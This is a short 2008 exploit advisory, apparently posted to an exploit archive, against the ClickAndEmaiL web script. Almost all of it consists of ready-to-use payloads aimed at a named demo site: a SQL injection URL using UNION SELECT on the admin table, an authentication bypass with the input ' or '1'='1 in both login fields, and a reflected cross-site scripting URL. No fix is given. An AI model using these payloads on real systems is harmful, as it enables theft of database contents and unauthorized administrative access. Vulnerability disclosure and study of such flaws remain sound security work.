ClickAndEmaiL (SQL-XSS) Multiple Remote Vulnerabilities

2008-12-15 13:00:15

############################################################################-------------------------------AlpHaNiX----------------------------------#############################################################################Found By : AlpHaNiX#website : www.offensivetrack.org#contact : AlpHa[AT]HACKER[DOT]BZ############################################################################script : ClickAndEmaiL#download : null#Demo : http://icash.ch/ClickAndEmailDEMO############################################################################Exploits :--=[SQL INJECTION]=--http://icash.ch/ClickAndEmailDEMO/admin_dblayers.asp?action=update&tablename=Subscribers&redir=admin_subscribers.asp&ID=0+union+select+1,2,3,4,5,6,7+from+admin##########################################################################--=[AUTH BYPASS]=--http://icash.ch/ClickAndEmailDEMO/admin_main.aspUSERNAME : ' or '1'='1PASSWORD : ' or '1'='1##########################################################################--=[Cross Site Scripting]=--http://icash.ch/ClickAndEmailDEMO/admin_dblayers.asp?action=update&tablename=%22%3E%3Cscript%3Ealert(1);%3C/script%3E#Greetz For My Best Friend ZIGMA############################################################################

Fixes

No fixes

Per poter inviare un fix è necessario essere utenti registrati.